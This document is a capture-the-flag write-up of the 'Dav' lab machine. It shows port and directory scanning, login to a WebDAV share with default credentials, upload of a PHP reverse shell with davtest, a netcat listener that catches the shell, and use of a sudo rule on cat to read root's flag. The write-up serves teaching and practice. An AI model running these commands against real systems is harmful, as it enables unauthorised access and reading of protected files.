Dav
This report details the successful exploitation of a misconfigured WebDAV service on the target system (10.10.168.117). The vulnerability allowed for the upload of a malicious PHP reverse shell, leading to command execution as the www-data user. Further, a sudo misconfiguration permitted privilege escalation to the root user, granting full administrative control over the system. The root flag was successfully retrieved.
1. Reconnaissance and Enumeration
1.1. Port Scanning
export TARGET_IP=10.10.168.117 # Best practice: define target at the beginning
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
80/tcp open http
Interpretation:
- Port 80 (HTTP) was found to be open, indicating a web server.
1.2. Web Directory Enumeration
The feroxbuster tool was used to enumerate directories and files on the web server, utilizing a common wordlist. This helps identify hidden or less obvious resources.
feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt
Results:
401 GET 14l 54w 460c http://10.10.168.117/webdav
Interpretation:
- A directory
/webdavwas discovered, returning a 401 (Unauthorized) HTTP status code. This strongly suggests the presence of a WebDAV service requiring authentication.
2. Vulnerability Analysis and Exploitation: WebDAV
2.1. WebDAV Authentication Bypass (Default Credentials)
The presence of a 401 response on the /webdav directory prompted an investigation into default WebDAV credentials. External resources (blog posts and forum discussions) were consulted:
- https://thisiszzzombie.blogspot.com/2011/12/webdav-xampp-1.html
- https://community.apachefriends.org/f/viewtopic.php?t=17011&sid=adeec95cedc2dc0d675fc1842045b978
These resources suggested the default credentials wampp:xampp for some XAMPP WebDAV configurations. These credentials were used to successfully authenticate to the /webdav service.
2.2. File Enumeration
After successful authentication, the directory listing was explored.
- Discovered
passwd.davcontainingwampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
2.3. WebDAV File Upload (Reverse Shell)
The davtest tool was used to confirm the ability to upload files to the WebDAV server. This tool specifically tests for WebDAV vulnerabilities, including file upload capabilities. A PHP reverse shell from revshells.com (using the PentestMonkey script) was used.
davtest -auth wampp:xampp -url http://10.10.168.117/webdav -uploadfile phppentestmonkey.php -uploadloc phppentestmonkey.php
Results:
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.168.117/webdav
********************************************************
unless Uploading file
Upload succeeded: http://10.10.168.117/webdav/phppentestmonkey.php
Interpretation:
davtestconfirmed that arbitrary file uploads were possible. The PHP reverse shell was successfully uploaded to the server.
2.4. Gaining a Shell
A Netcat listener was established on the attacker's machine to receive the reverse shell connection.
nc -lvnp 6666
The uploaded PHP reverse shell (phppentestmonkey.php) was then accessed via a web browser (or curl), triggering the connection back to the listener. This established a command shell on the target system.
# Commands executed *after* gaining the shell:
id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
3. Privilege Escalation
3.1. sudo Misconfiguration
The sudo -l command was executed to determine if the current user (www-data) had any elevated privileges via sudo.
sudo -l
# Output: (ALL) NOPASSWD: /bin/cat
Interpretation:
- The
www-datauser was permitted to execute/bin/catas any user (includingroot) without requiring a password.
3.2. Gaining Root Access
The sudo misconfiguration was exploited to read the contents of the /root/root.txt file, which is typically only readable by the root user.
sudo cat /root/root.txt